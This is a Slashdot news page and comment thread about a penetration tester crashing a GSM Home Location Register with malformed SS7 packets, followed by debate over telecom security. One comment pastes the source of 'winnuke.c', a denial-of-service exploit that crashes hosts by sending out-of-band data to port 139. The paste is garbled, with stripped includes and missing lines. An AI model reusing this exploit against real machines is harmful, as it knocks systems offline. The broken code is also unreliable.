×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

Lone Packet Crashes Telco Networks

Soulskill posted more than 2 years ago | from the sharpshooting-with-information dept.

Network 57

mask.of.sanity writes "A penetration tester has shown that GSM communications systems can be taken down with a handful of malformed packets. The weakness was in the lack of security around the Home Location Register server clusters which store GSM subscriber details as part of the global SS7 network. A single packet, sent from within any network including femtocells, took down one of the clusters for two minutes."

Sorry! There are no comments related to the filter you selected.

Hardly surprising... (3, Informative)

jonwil (467024) | more than 2 years ago | (#41630819)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

Re:Hardly surprising... (3, Informative)

Another, completely (812244) | more than 2 years ago | (#41630925)

They do have security designed in, but it's the hard-outer-shell variety. Doesn't GSM authenticate handsets by having the home register send a challenge along with the appropriate response in a plain-text packet to the cell? The first GSM "attack" I heard about involved connecting your fake phone to a cell, and listening to the microwave channel to hear what response you should send when it sends a challenge. It doesn't sound like a clever design, but I suppose it was trying to reduce communication and memory requirements at the home register?

Re:Hardly surprising... (1)

Fnord666 (889225) | more than 2 years ago | (#41633021)

They do have security designed in, but it's the hard-outer-shell variety.

Isn't that the M&M security method with a hard outer shell and a soft creamy center?

Re:Hardly surprising... (5, Insightful)

Severus Snape (2376318) | more than 2 years ago | (#41630975)

You surely can't be that naive and must be trolling. GSM masts are critical pieces of infrastructure in mobile telecoms and it's in every stakeholders that they are secure and reliable. It's security researchers jobs to find these holes, if they were so poorly designed we'd see stories like this every day.

Re:Hardly surprising... (4, Informative)

queazocotal (915608) | more than 2 years ago | (#41631183)

Well, no.

The barrier to entry for a firefox security hole is really, really low.
Typically anyone with a computer can do it, with no external equipment.
In addition, it's typically legal to do. (though that may not stop some).

Knowledge of how tcp/ip and similar standards work is widespread, and lots of people know this.

For hacking cell networks, it's a bit different.

It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it.
You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.
You are doing something that is often illegal, or of dubious legality at best.

All of these combine to make the pool of attackers orders of magnitude smaller.

Re:Hardly surprising... (4, Interesting)

Gerald (9696) | more than 2 years ago | (#41631289)

The barrier for GSM is getting lower every day [osmocom.org] so it wouldn't surprise me if bugs like this start showing up more often.

Re:Hardly surprising... (4, Insightful)

Megane (129182) | more than 2 years ago | (#41631331)

It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it. You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack. You are doing something that is often illegal, or of dubious legality at best.

What you are talking about is security through obscurity, [wikipedia.org] which is of dubious security at best.

Re:Hardly surprising... (2, Informative)

geekoid (135745) | more than 2 years ago | (#41631475)

Security through obscurity is a perfectly fine layer of security.

Re:Hardly surprising... (4, Insightful)

grcumb (781340) | more than 2 years ago | (#41631733)

"Security through obscurity is a perfectly fine extra layer of security."

FTFY

In other words: If you're relying on obscurity, you're doing it wrong.

Re:Hardly surprising... (2)

DarkOx (621550) | more than 2 years ago | (#41633035)

No its not fine as a layer, and yes if you rely on it you are most certainly doing it wrong. While I'll agree it might be best not publish you network diagrams and similar as that might just be inviting trouble your components should not be secret.

It can take way less time than you might be inclined to think for skilled cracker to develop a vulnerability. If they get their foot in the door anywhere, that obscure device or software component might well be their easiest path to escalated privileges. Since few use it and few have access the weakness have not been exposed, patches and mitigation strategies not developed. It ends up in many cases being easy prey for a 0-day.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41633191)

No its not fine as a layer, and yes if you rely on it you are most certainly doing it wrong.

A single layer is not a whole system.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634371)

The "extra" you added is redundant and implied by the parent's use of the word "layer".

Here is a link for you to brush up on your writing skills. http://writingguide.geneseo.edu/?pg=topics/luciditysimplicity.html

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632129)

Security by obscurity is perfectly cromulent and can embiggen anyone's security system.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632241)

Encryption is just security through obscurity anyway.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632719)

What you are talking about is security through obscurity, which is of dubious security at best.

Yet look how long this model has worked for Apple with OS X.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634853)

Er, that wasn't "security through obscurity" so much as "security through no-one caring enough about a few OS X machines to bother targetting them"(!)

Re:Hardly surprising... (1)

SleazyRidr (1563649) | more than 2 years ago | (#41634665)

Actually I thought he was talking about how bad the mobile networks are. The comment to which he was replying said that there are a lot of people trying to find these holes, so we'd find them all, but really there aren't that many people in a position to look for the holes, thus many will go unfound.

Re:Hardly surprising... (2, Interesting)

camperdave (969942) | more than 2 years ago | (#41632173)

You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.

Specialized equipment? You can probably do it with a cheap Android cell phone and some warez.

Re:Hardly surprising... (4, Interesting)

queazocotal (915608) | more than 2 years ago | (#41633125)

In essentially all android and other phones, the 'modem' runs on a seperate processor, running its own OS, signed.
'owning' the base android phone does nothing.
You need to separately crack the modem. (unlocking is not cracking).
The modem in most phones is basically a hayes-compatible modem, with a wierd interface soldered onto the board.
The only interfaces the android side has to it is 'AT' commands.
It can't inject raw packets, or ...

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634535)

Mod UP!

Re:Hardly surprising... (1)

kelemvor4 (1980226) | more than 2 years ago | (#41631455)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

Not to mention they were designed in 1990, and anything above only a minimal level of security is "optional". The world (or the parts of it that still use GSM) need to move on.

Re:Hardly surprising... (3, Insightful)

scamper_22 (1073470) | more than 2 years ago | (#41631757)

Or there's a much simpler explanation... people who design protocols make tradeoffs or don't care about security.

Most of the Internet protocols were designed in a relatively open way. Are they secure?

Have you perhaps taken a look at SMTP, HTTP... heck even TCP isn't really secure. There's no authentication.

Now yes, things have been built on top of things and security added on and more focused on... but really...

In any case, just looking at history in the internet space, I think the lack of security has more to do with tradeoffs and trying to get things out quickly than any grand plan for patents.

Re:Hardly surprising... (4, Interesting)

camperdave (969942) | more than 2 years ago | (#41632139)

Security is a presentation layer issue. SMTP, HTTP and TCP are not session layer protocols, and have no business worrying about security.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632577)

Security is a presentation layer issue.
SMTP, HTTP and TCP are not session layer protocols, and have no business worrying about security.

Security can often be collobration between layers.
While you want authentication as high up in the stack as you can get it lower layers may have a role to play in implementation.

Layer purism does not work in the real world. Sometimes inter-layer dependancies including lower layer dependancies are necessary to get the job done.

For example SMTP STARTTLS signals a TLS layer be injected under SMTP.

HTTP SERVER_PORT_SECURE header is necessary to transport security state of layers under HTTP to layers above HTTP.

Re:Hardly surprising... (4, Insightful)

DarkOx (621550) | more than 2 years ago | (#41633129)

Well yes and know. Authentication, Confidentiality, and forms of integrity are session or higher layer problems. Availability is also a key component of security. You can't tell me issues like ye'old LAND attack, tear drop, ping of death, negative sequence numbers etc don't cause Availability problems and they are decidedly network and transport layer. If I can cut your wire to jam your airwaves thats a physical layer issue.

Not quite.... (1)

Anonymous Coward | more than 2 years ago | (#41635065)

Security probably needs to exist at all layers of the OSI model.

It is true that some forms of security, relating to user data or user transactions, apply at the higher level and thus belong up in the topmost OSI network model layers.

On the other hand, if your lower layers are compromised, channel availability is lost or data is compromised. You can't exactly ignore that sort of security at the lower layers.

Every layer needs enough security so as to not be easily compromised.

Also note that the Internet was always meant to be a system of stacked protocols. We have things like SSL (okay, not perfect, has some flaws of its own) through which we can tunnel TCP/IP traffic. The SSL provides a lot of the security. A lot, but not all. You may note that TCP/IP design or implementation issues have caused critical network unavailability and what amount to security fixes have also been applied there. So even in a layered world, security still needs to exist throughout the protocol stack.

A protocol stack is only as strong as its weakest layer.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632431)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

What utter BS. You don't know what you are talking about. The standards were designed for interoperability...so that the Ericsson HLR can work with the Nortel SCP and the Alcatel base stations. This was less so for the American "standards" (e.g. CDMA) which were not so interoperable (these "standards" were controlled by two companies - Qualcomm at the base station level and Telcordia for the network).

Re:Hardly surprising... (1)

Cyberax (705495) | more than 2 years ago | (#41638227)

Not really. Telecom standards are an example of natural evolution of very long-living standards (consider this - phone networks predate the Internet itself!) and carry a lot of interoperability baggage. Besides, lots of modern standards were designed in 80-s and so they rely on contemporary technologies like ASN, that makes them hard to implement but is entirely understandable.

A missing break statement (2, Informative)

Anonymous Coward | more than 2 years ago | (#41630935)

A missing break statement was what brought down the eastern phone network in North America about 20 years ago. And the same simple problem seems to happen again.

Code samples? (-1, Troll)

GameboyRMH (1153867) | more than 2 years ago | (#41630961)

Can I haz?

The Lone Packet Crashed My Network (3, Funny)

Anonymous Coward | more than 2 years ago | (#41630967)

I was wondering why my router was playing the William Tell Overture.

What was in this packet? (3, Funny)

Anonymous Coward | more than 2 years ago | (#41630983)

Taco Bell Fire Sauce?

The malformed packet was... (-1)

Anonymous Coward | more than 2 years ago | (#41630989)

------ BEGIN PACKET -----
FR1ST P0ST!!!1
------ END PACKET -------

Re:The malformed packet was... (1)

Megane (129182) | more than 2 years ago | (#41631433)

Nope, it was actually:

+++ATH0

The RF portion of the standards is well designed (4, Interesting)

exabrial (818005) | more than 2 years ago | (#41631131)

The RF portion of the standards is well designed (take LTE with orthogonal multiplexing for example). However, the systems and switching part is waaay to complex. Telco providers are buried under mountains of technical debt... Even the systems part of LTE is complex: the American implementations from Sprint and Verizon are not be compatible because they cherry picked what parts they felt like implementing.

Re:The RF portion of the standards is well designe (2, Funny)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#41631603)

Thankfully there are no examples of 'inter-networking' actually working in the wild, much less crazy stuff like hardware that can connect easily to almost any of those 'inter-networked' networks through standardized interfaces and protocols, so we can cut them some slack for failing to achieve such an absurdly difficult task...

Re:The RF portion of the standards is well designe (1, Troll)

jonwil (467024) | more than 2 years ago | (#41631663)

GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)

Re:The RF portion of the standards is well designe (0)

Anonymous Coward | more than 2 years ago | (#41632785)

GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)

BS, you have no idea about what you are talking about. The standards are complex because they are designed for interoperability and extendability (a set of "capabilities" which can be used to create complex telecommunication services).

Re:The RF portion of the standards is well designe (1)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#41638947)

I suspect that the telco desire to resist moving intelligence to the edges of the network has something to do with it. Ye olde intertubes are not so dumb as they seem; but they are rather closer to just carrying packets and leaving the rest to consenting adults than the cell networks are.

Re:The RF portion of the standards is well designe (1)

exabrial (818005) | more than 2 years ago | (#41633345)

I think the best example of inter-networking is worldwide GSM actually. You can take a GSM phone all over Europe and roam just fine.

I usually... (3, Funny)

phil_aychio (2438214) | more than 2 years ago | (#41631263)

do my penetration testing with my malformed package

Re:I usually... (1)

Anonymous Coward | more than 2 years ago | (#41631509)

Your hand accomodates about anything, doesn't it?

Re:I usually... (0)

Anonymous Coward | more than 2 years ago | (#41632127)

Your hand accomodates about anything, doesn't it?

Only for ports that are in promiscuous mode.

Sometimes you don't even need a malformed packet (4, Interesting)

Anonymous Coward | more than 2 years ago | (#41631747)

When I was testing a broadband access server at my first job, I've seen a case ping with explicitly specified packet size of 0 caused a divByZeroException on the receiving end. I couldn't resist reporting this bug in person to see the reaction on the developper's face. It was priceless. =)
Someone else had also found a TFTP packet of death, when broadcasted all boxes under test crashed.
Now when you factor in maliciously malformed packets, it doesn't surprise me these things happen at all.

Kinda reminds me of this (1)

kurt555gs (309278) | more than 2 years ago | (#41631943)

/* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

#include
#include
#include
#include
#include
#include
#include

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
          struct sockaddr_in blah;
          struct hostent *he;
          bzero((char *)&blah,sizeof(blah));
          blah.sin_family=AF_INET;
          blah.sin_addr.s_addr=inet_addr(server);
          blah.sin_port=htons(port);

        if ((he = gethostbyname(server)) != NULL) {
                bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
        }
        else {
                  if ((blah.sin_addr.s_addr = inet_addr(server)) \n",argv[0]);
              exit(0);
          }

          if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
                perror("socket()");
                exit(-1);
          }

          open_sock(s,argv[1],dport);

          printf("Sending crash... ");
              send(s,str,strlen(str),MSG_OOB);
              usleep(100000);
          printf("Done!\n");
          close(s);
}

I'm sorry (1)

fustakrakich (1673220) | more than 2 years ago | (#41632655)

But this sounds more like a feature...

Remember the Ping-O-Death (3, Interesting)

xmas2003 (739875) | more than 2 years ago | (#41632811)

Us old farts will remember something similar called the Ping-O-Death! ;-) [wikipedia.org]

Re:Remember the Ping-O-Death (1)

Amouth (879122) | more than 2 years ago | (#41634523)

That was always fun to do in the labs, so much fun.

Marketers are listening (0)

Anonymous Coward | more than 2 years ago | (#41632813)

I go for many days between calls on my pay-as-you-go Nexus S. Mostly I use skype to communicate with folks so the phone isn't used much as a phone.

Last few years I've noticed a correlation between phone activity and unsolicited marketing calls. Once a day shortly after I take a call I'll get a robocall from some mortgage refinance outfit.

They're listening to radio traffic to target GSM phones that are likely to complete the calls. That or t-mobile is selling call records in real-time to marketers.

They should use the security flag (0)

Anonymous Coward | more than 2 years ago | (#41632861)

https://tools.ietf.org/html/rfc3514

Authorities deny second packet, let truth prevail! (1)

Pvt_Waldo (459439) | more than 2 years ago | (#41633001)

Check the Zapruder trace man, there was clearly a second packet on the grassy knoll! If you trace the first one, it came in via the ethernet port, out the USB, then back in via an SD card - which I say is impossible. Had to be a second packet.

FUD (0)

Anonymous Coward | more than 2 years ago | (#41633019)

FUD by some self proclaimed security expert, I wounder how he is able to send ss7 packets from a cell site :)
ss7 doesn't reach cell sites only down to BSC's.

I also think it should be kept in mind that GSM technology was standardised in late eighties, and big players such as AT&T allready have started shuiting down their GSM networks.

Someone is seeking atention.

The reason for this is (1)

kilodelta (843627) | more than 2 years ago | (#41633499)

When Signalling System 7 (SS7) specifications were written, there was no assumption that anyone other than a proper telco could access the network. Of course equal access provisions and telephony developments have peeled back the layers separating the user from the signalling pattern.

Kind of how the Bell System used audio tones to control network functions until finally moving to out of band signalling.

Their thinking at the time was that it offered a solution for sending information across the voice network and that most of the public wouldn't have access to the equipment of a tolerance necessary to generate and interpret those tones. They were very wrong about that part. But more astounding, they published details of the system in their technical publications. So it was sort of naive of them to think nobody would ever hack into the Bell System.

The same is true in the field of other utilities like electric and gas generation and distribution. Look at SCADA - someone got the bright idea to tie SCADA to the network for ease of management. And then all of a sudden they acted all surprised when people started poking around. And as someone familiar with the NERC specifications - the real upshot of NERC is to log for forensics. There's no active prevention per se.

AMPS was the best (0)

Anonymous Coward | more than 2 years ago | (#41634717)

AMPS was the best cell phone scheme. It would travel for miles and would always have a signal even in the sticks. GSM sucks, it isn't reliable in rural areas. CDMA is better than GSM and TDMA but no way competes with AMPS in range. And with AMPS there were no 'packet' issues, there was no internet either with AMPS but that made it safer.

Recent GSM blackout (0)

Anonymous Coward | more than 2 years ago | (#41637425)

It reminds me of a recent major GSM black out :
http://www.computerworlduk.com/news/mobile-wireless/3368648/orange-mobile-database-flaw-affects-26-million-in-france/

Could it be related ?

Meh (1)

Lord Strongpants (2751893) | more than 2 years ago | (#41640393)

Random magazine reports on talk at random conference by random pen tester dude who sez "Wow the world's telco networks are so insecure like I've hacked them heaps of times I'm pretty 1337" (I'm paraphrasing a bit but that's basically it). Well ... meh. Although, point that world's telco networks are pretty insecure, and the main limiting factor on the amount of hacking going on is just the amount of people who bother trying, is valid. Cheers.

Attention seekers (0)

Anonymous Coward | more than 2 years ago | (#41642125)

I was looking through the slides and I saw a lot of screen shots from Ericsson nodes and lots of boasts such as SMS is easy to intercept ... But no real proof of actual penetration or interception.

Like the slide with the title "printing money". the show a screen shot of someone defining vouchers in Ericsson charging system, yes if you have access to the node you can provision vouchers for prepaid top ups, the tricky part is how do you get access to a node that isn't connected to the Internet ?

It was mostly a lot of bs captain crunch etc it was a while since that was an actual vector

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?